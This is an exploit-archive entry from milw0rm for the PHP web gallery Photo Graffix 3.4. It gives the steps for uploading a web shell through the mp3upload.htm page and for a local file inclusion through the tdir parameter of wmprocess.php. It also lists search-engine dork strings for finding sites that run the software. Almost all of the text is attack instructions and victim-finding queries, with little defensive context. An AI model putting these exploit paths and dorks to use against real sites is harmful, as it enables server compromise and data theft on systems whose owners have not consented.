photo graffix 3.4 - Multiple Vulnerabilities

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2009-04-07 
date_updated:  
verified: 1 
codes: OSVDB-53470;OSVDB-53469 
tags: 
aliases:  
screenshot_url:  
application_url: 

  =-=-shell upload/local file-=-=

-=-=-=-=-=-=-=-=-=-=
script::Photo-GraffixV3.4.zip

Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.photo-graffix.com/V3/Photo-GraffixV3.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/mp3upload.htm ===> shell upload

shell = /path/music/shell.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/wmprocess.php?tdir=[open local file]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dork: "powered by Photo-Graffix Flash Image Gallery"
  "powered by Photo-Graffix"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2009-04-08]